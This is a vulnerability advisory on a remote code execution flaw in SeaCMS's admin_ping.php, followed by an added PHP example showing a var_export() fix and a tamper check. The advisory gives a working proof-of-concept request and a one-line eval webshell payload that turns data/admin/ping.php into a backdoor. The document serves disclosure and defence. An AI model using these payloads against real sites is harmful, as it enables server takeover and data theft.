Vulnerability description
A code audit of SeaCMS found a remote code execution vulnerability.
The file /jxz7g2/admin_ping.php contains an arbitrary code write: attacker-controlled POST values are written as PHP source into /data/admin/ping.php, and /data/admin/ping.php can then be requested directly, which executes the injected code. (jxz7g2 is the admin backend directory; its name is generated randomly during installation, so the attacker must know it to reach this file.)
Problem type
Remote code execution
Product
SeaCMS
Version
SeaCMS <= V12.8
Download address
Latest version: GitHub - seacms-net/CMS (SeaCMS program release)
Detailed process
The vulnerable code, the set branch of admin_ping.php, is as follows:
if($action=="set")
{
    // Both values come straight from the POST body; nothing validates or escapes them.
    $weburl = $_POST['weburl'];
    $token  = $_POST['token'];
    // ping.php is opened for writing, so every request overwrites it completely.
    $open = fopen("../data/admin/ping.php", "w");
    // The two values are concatenated into PHP source between literal double quotes.
    $str  = '<?php ';
    $str .= '$weburl = "';
    $str .= "$weburl";
    $str .= '"; ';
    $str .= '$token = "';
    $str .= "$token";
    $str .= '"; ';
    $str .= " ?>";
    fwrite($open, $str);
    fclose($open);
    ShowMsg("成功保存设置!", "admin_ping.php"); // "Settings saved successfully!"
    exit;
}
When action==set, the parameters weburl and token are read from the POST body. The two values are concatenated into a piece of PHP source and written to data/admin/ping.php. Because nothing filters or escapes them, a value containing a double quote closes the string literal the code opened, so an attacker can append arbitrary PHP statements, and they end up in data/admin/ping.php as executable code.
The POC is as follows:
POST /seacms/jxz7g2/admin_ping.php?action=set
……
weburl=123";phpinfo();"
With this value and an empty token, the handler writes the following line to data/admin/ping.php:
<?php $weburl = "123";phpinfo();""; $token = ""; ?>
The leading 123" closes the string literal the code opened, phpinfo(); then stands as a statement of its own, and the trailing " reopens a string so that the rest of the generated line still parses.
Verifying this in practice: data/admin/ping.php now contains phpinfo(), and requesting data/admin/ping.php directly runs it, so the injected code executes.
Get Shell
Sending the same request with the following payload:
weburl=123";@eval($_POST["cmd"]);"
writes a one-line webshell into data/admin/ping.php that evaluates the cmd POST parameter. Connecting to data/admin/ping.php with AntSword, using cmd as the connection parameter, succeeds.
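To make the break-out concrete and to show what a fix looks like, here is an added PHP example; it is not SeaCMS code and not part of the original writeup. It reduces the handler's string assembly to a pure function, runs both payloads from this page through it and through a hardened version that uses var_export() to emit a properly escaped literal, and tokenizes each result with token_get_all() to list any function call or eval that landed outside a string literal. The field validation rules (weburl must be a URL, token alphanumeric) are assumptions about what the ping settings need, not something the project specifies. Nothing is written to data/admin/ping.php.

```php
<?php
// Added example, not SeaCMS code. Models the string assembly of the vulnerable
// `set` branch, shows why the two payloads from this writeup become live PHP,
// and gives a hardened replacement. Nothing is written to data/admin/ping.php.

// Equivalent to the concatenation in admin_ping.php, reduced to a pure function.
function vulnerable_ping_php(string $weburl, string $token): string
{
    return '<?php $weburl = "' . $weburl . '"; $token = "' . $token . '"; ?>';
}

// Hardened replacement: var_export() emits a correctly quoted and escaped
// string literal, so the value can never close the quote and start a statement.
function safe_ping_php(string $weburl, string $token): string
{
    return '<?php $weburl = ' . var_export($weburl, true)
         . '; $token = ' . var_export($token, true) . '; ?>';
}

// Input validation to run before saving (defense in depth; the escaping above
// is what actually prevents the injection). The field shapes are assumptions.
function validate_ping_settings(string $weburl, string $token): void
{
    if (filter_var($weburl, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('weburl must be a valid URL');
    }
    if (!preg_match('/\A[A-Za-z0-9_-]{1,128}\z/', $token)) {
        throw new InvalidArgumentException('token must match [A-Za-z0-9_-]{1,128}');
    }
}

// Tokenize generated PHP and list every bare identifier (T_STRING, i.e. a
// function or constant name) and eval found outside string literals. For a
// legitimate ping.php the list is empty; point it at a deployed
// data/admin/ping.php to check for tampering.
function injected_calls(string $code): array
{
    $calls = [];
    foreach (token_get_all($code) as $tok) {
        if (!is_array($tok)) {
            continue; // single-character tokens such as ';' or '('
        }
        if ($tok[0] === T_EVAL) {
            $calls[] = 'eval';
        } elseif ($tok[0] === T_STRING) {
            $calls[] = $tok[1];
        }
    }
    return $calls;
}

// The two payloads used in this writeup, with token left empty as in the POC.
$payloads = [
    'phpinfo'  => '123";phpinfo();"',
    'webshell' => '123";@eval($_POST["cmd"]);"',
];

foreach ($payloads as $name => $weburl) {
    $bad  = vulnerable_ping_php($weburl, '');
    $good = safe_ping_php($weburl, '');
    echo "[$name] vulnerable: $bad\n";
    echo "   calls outside strings: " . implode(',', injected_calls($bad)) . "\n";
    echo "[$name] hardened:   $good\n";
    echo "   calls outside strings: " . implode(',', injected_calls($good)) . "\n";
    try {
        validate_ping_settings($weburl, '');
    } catch (InvalidArgumentException $e) {
        echo "   validation: rejected (" . $e->getMessage() . ")\n";
    }
}

// Optional: check an installed copy given as the first CLI argument.
if (PHP_SAPI === 'cli' && isset($argv[1]) && is_readable($argv[1])) {
    $found = injected_calls(file_get_contents($argv[1]));
    echo $argv[1] . ': ' . ($found ? 'SUSPICIOUS, calls: ' . implode(',', $found) : 'clean') . "\n";
}
```

Run it with php on the command line; for the two payloads the vulnerable output reports phpinfo and eval as calls outside string literals, while the hardened output reports none because var_export() turns the whole value into one single-quoted literal. Passing the path of a deployed data/admin/ping.php as the first argument reports whether it contains anything beyond the two assignments. Note that var_export(), not the validation, is what closes the hole; treat the URL check as a sanity filter only.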